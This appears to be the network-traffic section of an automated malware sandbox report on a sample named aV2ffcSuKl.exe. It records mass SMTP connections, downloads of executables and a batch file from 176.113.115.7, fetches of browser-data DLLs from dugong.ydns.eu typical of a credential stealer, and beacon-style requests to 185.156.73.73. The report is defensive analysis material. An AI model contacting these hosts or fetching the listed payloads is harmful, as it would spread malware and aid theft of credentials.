Source: global traffic | TCP traffic: 192.168.2.11:64660 -> 64.190.63.222:587
Source: global traffic | TCP traffic: 192.168.2.11:64665 -> 162.215.212.254:587
Source: global traffic | TCP traffic: 192.168.2.11:64666 -> 145.226.46.83:587
Source: global traffic | TCP traffic: 192.168.2.11:64670 -> 35.237.212.184:587
Source: global traffic | TCP traffic: 192.168.2.11:64671 -> 181.209.27.66:587
Source: global traffic | TCP traffic: 192.168.2.11:64675 -> 195.8.66.22:587
Source: global traffic | TCP traffic: 192.168.2.11:64676 -> 109.234.165.210:587
Source: global traffic | TCP traffic: 192.168.2.11:64678 -> 31.204.93.82:587
Source: global traffic | TCP traffic: 192.168.2.11:64681 -> 75.2.126.67:587
Source: global traffic | TCP traffic: 192.168.2.11:64682 -> 46.229.230.48:587
Source: global traffic | TCP traffic: 192.168.2.11:64684 -> 183.110.214.4:587
Source: global traffic | TCP traffic: 192.168.2.11:64685 -> 194.30.0.214:587
Source: global traffic | TCP traffic: 192.168.2.11:64686 -> 20.76.201.171:587
Source: global traffic | TCP traffic: 192.168.2.11:64689 -> 20.23.151.207:587
Source: global traffic | TCP traffic: 192.168.2.11:64690 -> 81.169.145.86:587
Source: global traffic | TCP traffic: 192.168.2.11:64692 -> 217.116.0.228:587
Source: global traffic | TCP traffic: 192.168.2.11:64697 -> 142.132.166.12:587
Source: global traffic | TCP traffic: 192.168.2.11:64702 -> 212.35.60.35:587
Source: global traffic | TCP traffic: 192.168.2.11:64703 -> 156.241.15.30:587
Source: global traffic | TCP traffic: 192.168.2.11:64708 -> 35.167.11.172:587
Source: global traffic | TCP traffic: 192.168.2.11:64709 -> 185.230.212.166:587
Source: global traffic | TCP traffic: 192.168.2.11:64722 -> 219.64.12.157:587
Source: global traffic | TCP traffic: 192.168.2.11:64725 -> 52.101.42.18:587
Source: global traffic | TCP traffic: 192.168.2.11:64726 -> 87.252.1.21:587
Source: global traffic | TCP traffic: 192.168.2.11:64728 -> 185.97.217.16:587
Source: global traffic | TCP traffic: 192.168.2.11:64730 -> 89.46.106.23:587
Source: global traffic | TCP traffic: 192.168.2.11:64731 -> 80.252.97.80:587
Source: global traffic | TCP traffic: 192.168.2.11:64735 -> 95.111.239.188:587
Source: global traffic | TCP traffic: 192.168.2.11:64741 -> 193.137.45.66:587
Source: global traffic | TCP traffic: 192.168.2.11:64746 -> 104.21.112.1:587
Source: global traffic | TCP traffic: 192.168.2.11:64748 -> 162.159.205.17:587
Source: global traffic | TCP traffic: 192.168.2.11:64749 -> 46.242.144.130:587
Source: global traffic | TCP traffic: 192.168.2.11:64753 -> 162.255.118.7:587
Source: global traffic | TCP traffic: 192.168.2.11:64754 -> 162.22.250.190:587
Source: global traffic | TCP traffic: 192.168.2.11:64758 -> 52.28.153.152:587
Source: global traffic | TCP traffic: 192.168.2.11:64760 -> 212.72.229.180:587
Source: global traffic | TCP traffic: 192.168.2.11:64763 -> 209.202.254.90:587
Source: global traffic | TCP traffic: 192.168.2.11:64772 -> 34.160.13.42:587
Source: global traffic | TCP traffic: 192.168.2.11:64774 -> 94.169.2.19:587
Source: global traffic | TCP traffic: 192.168.2.11:64777 -> 204.74.99.100:587
Source: global traffic | TCP traffic: 192.168.2.11:64782 -> 117.50.20.113:587
Source: global traffic | TCP traffic: 192.168.2.11:64794 -> 76.76.21.21:587
Source: global traffic | TCP traffic: 192.168.2.11:64796 -> 80.48.169.1:587
Source: global traffic | TCP traffic: 192.168.2.11:64797 -> 80.91.55.62:587
Source: global traffic | TCP traffic: 192.168.2.11:64798 -> 94.20.74.2:587
Source: global traffic | TCP traffic: 192.168.2.11:64800 -> 124.153.64.203:587
Source: global traffic | TCP traffic: 192.168.2.11:64804 -> 87.238.28.12:587
Source: global traffic | TCP traffic: 192.168.2.11:64805 -> 194.181.228.5:587
Source: global traffic | TCP traffic: 192.168.2.11:64809 -> 217.19.248.132:587
Source: global traffic | TCP traffic: 192.168.2.11:64815 -> 195.130.132.9:587
Source: global traffic | TCP traffic: 192.168.2.11:64820 -> 45.60.85.192:587
Source: global traffic | TCP traffic: 192.168.2.11:64822 -> 88.99.165.61:587
Source: global traffic | TCP traffic: 192.168.2.11:64824 -> 81.198.164.220:587
Source: global traffic | TCP traffic: 192.168.2.11:53660 -> 96.102.167.164:587
Source: global traffic | TCP traffic: 192.168.2.11:53677 -> 211.29.132.105:587
Source: global traffic | TCP traffic: 192.168.2.11:53684 -> 45.60.245.113:587
Source: global traffic | TCP traffic: 192.168.2.11:53691 -> 15.197.225.128:587
Source: global traffic | TCP traffic: 192.168.2.11:53692 -> 52.101.10.16:587
Source: global traffic | TCP traffic: 192.168.2.11:53693 -> 77.95.250.195:587
Source: global traffic | TCP traffic: 192.168.2.11:53696 -> 103.246.18.6:587
Source: global traffic | TCP traffic: 192.168.2.11:53708 -> 208.91.197.27:587
Source: global traffic | TCP traffic: 192.168.2.11:53709 -> 94.143.220.218:587
Source: global traffic | TCP traffic: 192.168.2.11:53710 -> 81.169.145.143:587
Source: global traffic | TCP traffic: 192.168.2.11:53714 -> 52.101.10.14:587
Source: global traffic | TCP traffic: 192.168.2.11:53718 -> 52.218.102.100:587
Source: global traffic | TCP traffic: 192.168.2.11:53720 -> 3.125.131.179:587
Source: global traffic | TCP traffic: 192.168.2.11:53721 -> 188.114.97.3:587
Source: global traffic | TCP traffic: 192.168.2.11:53722 -> 62.101.76.218:587
Source: global traffic | TCP traffic: 192.168.2.11:53728 -> 168.0.132.203:587
Source: global traffic | TCP traffic: 192.168.2.11:53731 -> 3.33.130.190:587
Source: global traffic | TCP traffic: 192.168.2.11:53738 -> 31.186.18.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53739 -> 193.70.18.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53751 -> 185.53.178.51:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53759 -> 64.136.53.168:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53766 -> 198.185.159.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53767 -> 80.158.66.24:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53770 -> 62.36.20.30:25
                                                Source: global trafficTCP traffic: 192.168.2.11:53771 -> 104.26.5.148:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53772 -> 149.5.31.97:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53776 -> 211.100.47.40:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53778 -> 99.83.253.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53875 -> 52.101.73.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53876 -> 3.130.253.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53888 -> 43.252.166.120:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53909 -> 104.37.34.248:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53911 -> 162.243.151.28:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53918 -> 45.60.33.125:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53922 -> 103.168.172.65:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53927 -> 72.163.4.185:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53929 -> 52.101.145.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53930 -> 107.150.100.76:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53941 -> 195.130.131.33:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53947 -> 45.40.151.233:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53956 -> 146.75.123.10:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53958 -> 76.223.84.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53961 -> 92.205.50.235:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50526 -> 185.138.56.214:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50527 -> 46.30.213.98:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50531 -> 52.101.137.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50536 -> 79.141.193.68:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50547 -> 217.74.65.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50554 -> 149.28.121.93:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50558 -> 83.166.143.44:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50559 -> 212.77.100.83:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50560 -> 91.226.98.187:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50565 -> 34.205.242.146:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50566 -> 46.30.213.169:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50575 -> 211.113.80.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50577 -> 200.58.112.97:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50578 -> 41.222.53.178:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50580 -> 195.182.6.60:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50581 -> 213.186.33.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50585 -> 188.114.96.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50586 -> 46.105.46.142:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50596 -> 52.98.241.194:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50600 -> 85.13.130.209:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50604 -> 212.11.225.17:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50608 -> 77.68.93.69:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50609 -> 209.240.204.200:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50610 -> 44.214.199.220:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50615 -> 104.26.6.19:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50617 -> 34.111.176.156:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50626 -> 151.101.2.159:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50632 -> 80.88.84.73:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50645 -> 193.7.207.36:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50646 -> 176.57.65.93:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50649 -> 148.163.149.246:587
                                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
                                                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00C8CE44
                                                Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    X-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiVocsBCIWgzQEIjafNAQjcvc0BCLnKzQEIq9HNAQiK080BCJ3WzQEIp9jNAQj5wNQVGOuNpRc=
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    X-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiVocsBCIWgzQEIjafNAQjcvc0BCLnKzQEIq9HNAQiK080BCJ3WzQEIp9jNAQj5wNQVGOuNpRc=
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    X-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiVocsBCIWgzQEIjafNAQjcvc0BCJDKzQEIucrNAQir0c0BCIrTzQEIndbNAQin2M0BCPnA1BUY642lFw==
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    X-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiVocsBCIWgzQEIjafNAQjcvc0BCJDKzQEIucrNAQir0c0BCIrTzQEIndbNAQin2M0BCPnA1BUY642lFw==
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                Source: global traffic | HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1
                                                    Connection: Keep-Alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Host: steamcommunity.com
                                                Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    X-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiUocsBCIWgzQEIjafNAQjcvc0BCLnKzQEIq9HNAQiK080BCJ3WzQEIp9jNAQj5wNQVGOuNpRc=
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    X-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiUocsBCIWgzQEIjafNAQjcvc0BCLnKzQEIq9HNAQiK080BCJ3WzQEIp9jNAQj5wNQVGOuNpRc=
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                    Connection: Keep-Alive
                                                Source: global traffic | HTTP traffic detected: GET /files/748049926/nhDLtPT.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET /files/5149365135/ILqcVeT.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET /files/koloples/vertualiziren.exe HTTP/1.1
                                                    Host: 45.59.120.8
                                                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
                                                    Host: dugong.ydns.eu
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /files/5149365135/rXOl0pp.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/sqlite3.dll HTTP/1.1
                                                    Host: dugong.ydns.eu
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET /test/am_no.bat HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/freebl3.dll HTTP/1.1
                                                    Host: dugong.ydns.eu
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/mozglue.dll HTTP/1.1
                                                    Host: dugong.ydns.eu
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/msvcp140.dll HTTP/1.1
                                                    Host: dugong.ydns.eu
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/nss3.dll HTTP/1.1
                                                    Host: dugong.ydns.eu
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/softokn3.dll HTTP/1.1
                                                    Host: dugong.ydns.eu
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/vcruntime140.dll HTTP/1.1
                                                    Host: dugong.ydns.eu
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET /success?substr=mixtwo&s=three&sub=non HTTP/1.1
                                                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                    User-Agent: 1
                                                    Host: 185.156.73.73
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /info HTTP/1.1
                                                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                    User-Agent: 1
                                                    Host: 185.156.73.73
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /update HTTP/1.1
                                                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                    User-Agent: 1
                                                    Host: 185.156.73.73
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /service HTTP/1.1
                                                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                    User-Agent: C
                                                    Host: 185.156.73.73
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /luma/random.exe HTTP/1.1
                                                    Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET /success?substr=mixfour&s=three&sub=non HTTP/1.1
                                                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                    User-Agent: 1
                                                    Host: 185.156.73.73
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/freebl3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/mozglue.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/msvcp140.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global traffic | DNS traffic detected: DNS query: cobolrationumelawrtewarms.com
                                                Source: global traffic | DNS traffic detected: DNS query: dugong.ydns.eu
                                                Source: global traffic | DNS traffic detected: DNS query: www.google.com
                                                Source: global traffic | DNS traffic detected: DNS query: towerbingobongoboom.com
                                                Source: global traffic | DNS traffic detected: DNS query: securesmtp.pttbsa.com
                                                Source: global traffic | DNS traffic detected: DNS query: inspfin.fed.be
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.terre-net.fr
                                                Source: global traffic | DNS traffic detected: DNS query: mail.gcl.aphp.fr
                                                Source: global traffic | DNS traffic detected: DNS query: latecis.fr
                                                Source: global traffic | DNS traffic detected: DNS query: dak-re.com
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.comcast.net
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.jubzpb.vop
                                                Source: global traffic | DNS traffic detected: DNS query: secure.mharelick.net
                                                Source: global traffic | DNS traffic detected: DNS query: mail.estrenar.com.co
                                                Source: global traffic | DNS traffic detected: DNS query: mail.wasp.nav.mil
                                                Source: global traffic | DNS traffic detected: DNS query: securesmtp.schmitt-wiesentheid.de
                                                Source: global traffic | DNS traffic detected: DNS query: mail.bfaga.com
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.associatedprivate.cn
                                                Source: global traffic | DNS traffic detected: DNS query: 888.COM
                                                Source: global traffic | DNS traffic detected: DNS query: aspmx5.googlemail.com
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.virgilio.it
                                                Source: global traffic | DNS traffic detected: DNS query: reseau-linux.fr
                                                Source: global traffic | DNS traffic detected: DNS query: teleline.es
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.termiso.pt
